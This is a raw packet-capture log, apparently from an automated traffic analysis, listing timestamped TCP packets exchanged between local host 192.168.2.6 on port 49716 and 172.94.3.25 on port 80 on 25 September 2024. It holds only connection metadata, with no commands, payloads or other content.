                                        Sep 25, 2024 18:40:29.427212954 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.427217960 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.427229881 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.427237988 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.427242994 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.427252054 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.427256107 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.427268028 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.427278996 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.427279949 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.427294016 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.427304029 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.427325964 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.570318937 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.575367928 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.575408936 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.575422049 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.575454950 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.575468063 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.575481892 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.575495958 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.575506926 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.575541973 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.575623989 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.575634956 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.575648069 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.575655937 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.575659990 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.575673103 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.575683117 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.575685024 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.575697899 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.575716019 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.575730085 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.575767040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.575778008 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.575790882 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.575803041 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.575813055 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.575815916 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.575829029 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.575917006 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.575930119 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.575942039 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.575948954 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.575954914 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.575967073 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.575978994 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.575979948 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.575993061 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576000929 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576004982 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576018095 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576025963 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576031923 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576050997 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576191902 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576203108 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576215982 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576224089 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576230049 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576248884 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576422930 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576435089 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576447010 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576455116 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576458931 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576472044 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576479912 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576483011 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576500893 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576504946 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576513052 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576524019 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576529980 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576535940 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576548100 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576555014 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576575994 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576579094 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576587915 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576598883 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576611996 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576617002 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576623917 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576636076 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576643944 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576647997 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576661110 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576668024 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576672077 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576685905 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576694012 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576698065 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576709986 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576718092 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576725006 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576736927 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576742887 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576750040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576764107 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576767921 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576776981 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576792002 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577025890 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577056885 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577156067 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577167988 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577179909 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577193975 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577202082 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577207088 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577223063 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577227116 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577235937 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577249050 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577251911 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577260971 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577274084 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577277899 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577295065 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577306032 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577308893 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577320099 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577337980 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577338934 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577352047 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577364922 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577370882 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577378035 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577390909 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577395916 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577403069 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577416897 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577424049 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577431917 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577445984 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577449083 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577466965 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577483892 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577826977 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577840090 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577853918 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577863932 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577867031 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577879906 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577883959 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577892065 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577904940 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577912092 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577924013 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577934980 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577946901 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577946901 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577961922 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577964067 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577984095 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577989101 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577996016 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578007936 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578021049 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578032970 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578035116 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578043938 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578057051 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578062057 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578069925 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578074932 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578082085 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578093052 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578104019 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578105927 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578119040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578130960 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578131914 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578145027 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578150988 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578185081 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578409910 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578421116 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578454018 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578583002 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578602076 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578613997 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578632116 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578634024 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578645945 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578663111 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578668118 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578681946 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578692913 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578694105 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578704119 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578716040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578722000 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578731060 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578743935 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578748941 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578758001 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578768969 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578773975 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578782082 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578794003 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578798056 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578807116 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578819990 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578823090 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578833103 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578845024 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578850985 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578857899 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578870058 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578875065 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578881979 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578895092 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578900099 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578907013 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578924894 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579271078 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579282999 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579302073 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579304934 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579313993 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579325914 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579333067 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579339981 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579354048 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579356909 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579366922 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579376936 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579396963 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579402924 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579411983 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579417944 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579437017 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579446077 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579448938 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579467058 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579479933 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579484940 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579493046 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579505920 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579509020 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579525948 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579534054 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579536915 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579547882 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579560041 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579566002 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579571962 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579585075 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579588890 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579598904 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579611063 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579615116 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579622984 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579636097 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579639912 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579648972 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579662085 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579664946 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579673052 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579685926 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579691887 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579696894 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579709053 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579716921 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579720974 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579741001 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580112934 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580126047 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580147982 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580270052 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580282927 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580295086 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580302954 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580307961 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580327988 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580327988 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580339909 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580351114 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580358982 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580363035 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580374956 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580383062 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580388069 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580399990 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580408096 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580414057 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580425978 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580434084 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580439091 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580451012 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580459118 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580486059 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580487967 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580498934 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580509901 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580522060 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580530882 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580534935 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580547094 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580554962 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580559015 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580571890 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580579996 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580584049 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580595970 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580604076 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580609083 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580621004 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580629110 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580635071 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580646992 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580653906 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580660105 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580672026 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580678940 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580686092 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580704927 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.581171036 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.581183910 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.581206083 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.581213951 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.581226110 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.581238031 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.581249952 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.581252098 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.581263065 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.581271887 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.581275940 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.581288099 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.581300020 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.581334114 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.742360115 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.749450922 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.749469995 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.749480963 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.749492884 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.749506950 CEST8049716172.94.3.25192.168.2.6
